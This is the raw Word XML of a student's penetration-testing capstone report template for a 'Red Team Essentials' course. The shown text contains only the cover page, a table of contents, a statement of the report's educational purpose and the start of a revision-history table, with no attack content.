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91D9A" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:spacing w:before="200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r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="743A48F9" wp14:editId="7B0E755C">
            <wp:extent cx="1128713" cy="320409"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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28713" cy="32040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7C17F41" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253BA014" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B78F355" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB03891" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova Extrabold" w:eastAsia="Proxima Nova Extrabold" w:hAnsi="Proxima Nova Extrabold" w:cs="Proxima Nova Extrabold"/>
          <w:color w:val="202026"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5976F162" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova Extrabold" w:eastAsia="Proxima Nova Extrabold" w:hAnsi="Proxima Nova Extrabold" w:cs="Proxima Nova Extrabold"/>
          <w:color w:val="202026"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43172D38" w14:textId="6F3C2341" w:rsidR="006F3573" w:rsidRDefault="00A34F25">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_5xilyzr0m6h6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Red</w:t>
      </w:r>
      <w:r w:rsidR="00F3284A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D37364">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">eam </w:t>
      </w:r>
      <w:r w:rsidR="00D37364">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Essentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E9768" w14:textId="49C13577" w:rsidR="00A34F25" w:rsidRDefault="00D37364" w:rsidP="00A34F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Capstone Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142CFCCF" w14:textId="1CEB5E3A" w:rsidR="00D37364" w:rsidRDefault="00D37364" w:rsidP="00A34F25">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8AA66C" w14:textId="6C46E015" w:rsidR="00D37364" w:rsidRDefault="00D37364" w:rsidP="00D37364">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="22B787"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760F7A24" wp14:editId="673CE025">
            <wp:extent cx="2933700" cy="293370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93370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5ACF8986" w14:textId="478FE3D9" w:rsidR="00D37364" w:rsidRPr="00D37364" w:rsidRDefault="00D20690" w:rsidP="00D37364">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37364">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BF5BA6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Phillip Newlove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038D9B23" w14:textId="7DD67B93" w:rsidR="00D37364" w:rsidRDefault="00D20690" w:rsidP="00D37364">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37364">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BF5BA6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>philn19872@hotmail.co.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD0766" w14:textId="6613D06F" w:rsidR="00D37364" w:rsidRPr="00D37364" w:rsidRDefault="00D20690" w:rsidP="00D37364">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="00BF5BA6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>16/12/23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573575B" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_zeehyv3ty2y4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="78CC63DE" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_qe4a6epuyfmi" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420364E" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc85467563"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Content:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="72D03582" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB" w:eastAsia="en-AU"/>
        </w:rPr>
        <w:id w:val="141135038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461D3B4" w14:textId="78A60DF9" w:rsidR="00D37364" w:rsidRDefault="00D37364">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="60ACCDE4" w14:textId="34B36FED" w:rsidR="00FB02EF" w:rsidRDefault="00D37364">
          <w:pPr>
            <w:pStyle w:val="TOC1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467563" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Content: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63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2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6063804A" w14:textId="71AA41B0" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1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64" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary: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64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3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643D7644" w14:textId="514446AC" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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65" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Document Revision History: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65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3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24EEF150" w14:textId="13F4B27D" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1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66" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objective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66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4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7DAC3F09" w14:textId="3DF0DD56" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1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67" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Minimum Requirements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67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4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64F60630" w14:textId="45E1ACD2" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1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69" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Penetration Testing Assessment Report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69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5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4D584317" w14:textId="4C9FA5C2" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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70" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary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70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5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4E12B986" w14:textId="43EC1FAA" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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71" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations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71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5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3F64204C" w14:textId="6DC78B57" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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72" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Methodology Overview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72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5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7F37DC8C" w14:textId="44CEC148" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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73" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Initial Enumeration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73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6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1D14D801" w14:textId="56FFD11F" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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74" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Services Discovered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74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6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43AF5CA1" w14:textId="4286DD8A" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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75" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Discussion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75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6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39816428" w14:textId="6E01ABCB" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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76" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Stage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76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6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33EC19F0" w14:textId="0AF95AA5" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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77" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation Enumeration Stage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77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7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03ABEA00" w14:textId="02231282" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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78" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation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78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7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753CC55C" w14:textId="25E8F77F" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3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79" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risks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79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7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376C3F93" w14:textId="77ABBB98" w:rsidR="00FB02EF" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10217"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc85467580" w:history="1">
            <w:r w:rsidR="00FB02EF" w:rsidRPr="00F177FC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Flags Obtained</w:t>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc85467580 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00FB02EF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78037D26" w14:textId="4ECFCCA2" w:rsidR="00D37364" w:rsidRDefault="00D37364">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0C7AC7F9" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D564A83" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52756020" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF591F9" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_sue23rk40om" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE024F" w14:textId="77777777" w:rsidR="006F3573" w:rsidRPr="00727D39" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="202026"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc85467564"/>
      <w:r w:rsidRPr="00727D39">
        <w:rPr>
          <w:color w:val="202026"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Summary:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="43DB4620" w14:textId="69B97C42" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:r w:rsidRPr="00727D39">
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00727D39">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D37364">
        <w:t xml:space="preserve">This document </w:t>
      </w:r>
      <w:r w:rsidR="00D7677E">
        <w:t>provides</w:t>
      </w:r>
      <w:r w:rsidR="00D37364">
        <w:t xml:space="preserve"> a template to guide the completion of </w:t>
      </w:r>
      <w:r w:rsidR="00D7677E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D37364">
        <w:t xml:space="preserve">penetration testing </w:t>
      </w:r>
      <w:r w:rsidR="00FC6049">
        <w:t>capstone project of the Red</w:t>
      </w:r>
      <w:r w:rsidR="00F3284A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6049">
        <w:t xml:space="preserve">Team Essentials course. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C8404" w14:textId="34E142BA" w:rsidR="00FC6049" w:rsidRDefault="00FC6049"/>
    <w:p w14:paraId="6B36BC90" w14:textId="71A4EE2F" w:rsidR="00FC6049" w:rsidRDefault="00FC6049">
      <w:r>
        <w:t xml:space="preserve">This report will be graded based on correctness and fullness of reporting to all aspects required. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5283E6" w14:textId="7B9AEE16" w:rsidR="00FC6049" w:rsidRDefault="00FC6049"/>
    <w:p w14:paraId="01ACB28A" w14:textId="11A70C31" w:rsidR="00FC6049" w:rsidRPr="00727D39" w:rsidRDefault="00FC6049">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00D7677E">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> purpose of this report is to</w:t>
      </w:r>
      <w:r w:rsidR="00CA2ADF">
        <w:t xml:space="preserve"> ensure the student</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E00A8" w14:textId="6B8A7FD5" w:rsidR="006F3573" w:rsidRPr="00FC6049" w:rsidRDefault="00CA2ADF" w:rsidP="006676FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00FC6049">
        <w:t xml:space="preserve">as a </w:t>
      </w:r>
      <w:r w:rsidR="00497B78">
        <w:t>complete</w:t>
      </w:r>
      <w:r w:rsidR="00FC6049">
        <w:t xml:space="preserve"> understand</w:t>
      </w:r>
      <w:r w:rsidR="00727B2F">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00FC6049">
        <w:t xml:space="preserve"> of the standard approach of penetration testing </w:t>
      </w:r>
      <w:r w:rsidR="00D20690" w:rsidRPr="00CA2ADF">
        <w:t>activities</w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3158D8B5" w14:textId="1967A48F" w:rsidR="00FC6049" w:rsidRPr="00CA2ADF" w:rsidRDefault="00CA2ADF" w:rsidP="006676FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00FC6049">
        <w:t xml:space="preserve">an execute a penetration testing </w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99DFFF" w14:textId="6A0DA8E3" w:rsidR="00CA2ADF" w:rsidRPr="00727D39" w:rsidRDefault="00CA2ADF" w:rsidP="006676FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Research vulnerabilities and determine an appropriate attack </w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C0E5C" w14:textId="0F507C93" w:rsidR="006F3573" w:rsidRPr="00727D39" w:rsidRDefault="00CA2ADF" w:rsidP="006676FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Report on their results, issues</w:t>
      </w:r>
      <w:r w:rsidR="00727B2F">
        <w:t xml:space="preserve"> found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and latent risks of the </w:t>
      </w:r>
      <w:r w:rsidR="00D20690">
        <w:t>vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CCA235" w14:textId="6EEBF6E7" w:rsidR="006F3573" w:rsidRPr="00727D39" w:rsidRDefault="00CA2ADF" w:rsidP="006676FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Make recommendations based on their results to defend against the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6182C3" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="006F3573">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E250F3" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="195" w:line="265" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc85467565"/>
      <w:r>
        <w:t>Document Revision History:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9900" w:type="dxa"/>
        <w:tblInd w:w="1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110"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F3573" w14:paraId="0F359FC3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="407"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A485983" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
            <w:pPr>
              <w:spacing w:after="16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lease</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="049ECB43" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
            <w:pPr>
              <w:spacing w:after="16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2700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE8868E" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
            <w:pPr>
              <w:spacing w:after="16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mments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="257EDECA" w14:textId="48BEA82F" w:rsidR="006F3573" w:rsidRDefault="00A53253">
            <w:pPr>
              <w:spacing w:after="160" w:line="259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prove</w:t>
            </w:r>
            <w:r w:rsidR="00F3284A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F3573" w14:paraId="0CFCB9A2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="173EAE0B" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
            <w:pPr>
              <w:spacing w:after="16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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA7AA4B" w14:textId="7D42C212" w:rsidR="006F3573" w:rsidRDefault="006A606D">
            <w:pPr>
              <w:spacing w:after="16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/12/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D3CF854" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
            <w:pPr>
